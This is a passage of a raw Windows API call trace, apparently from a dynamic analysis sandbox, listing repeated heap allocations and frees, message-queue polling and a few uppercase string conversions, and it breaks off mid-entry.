RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.221] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0189.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0189.221] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.221] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0189.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0189.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0189.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0189.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.222] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.222] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0189.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0189.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0189.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0189.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0189.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0189.224] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0189.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0189.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0189.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0189.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0189.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa418 [0189.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa460 [0189.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0189.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0189.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0189.227] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0189.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0189.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0189.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.227] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0189.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0189.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0189.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0189.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0189.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0189.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0189.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.229] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0189.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0189.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0189.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.229] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0189.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0189.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0189.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0189.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0189.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.231] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0189.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0189.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0189.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0189.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0189.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0189.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0189.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0189.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.232] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0189.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0189.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0189.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0189.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0189.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0189.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0189.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0189.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0189.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0189.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.233] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, 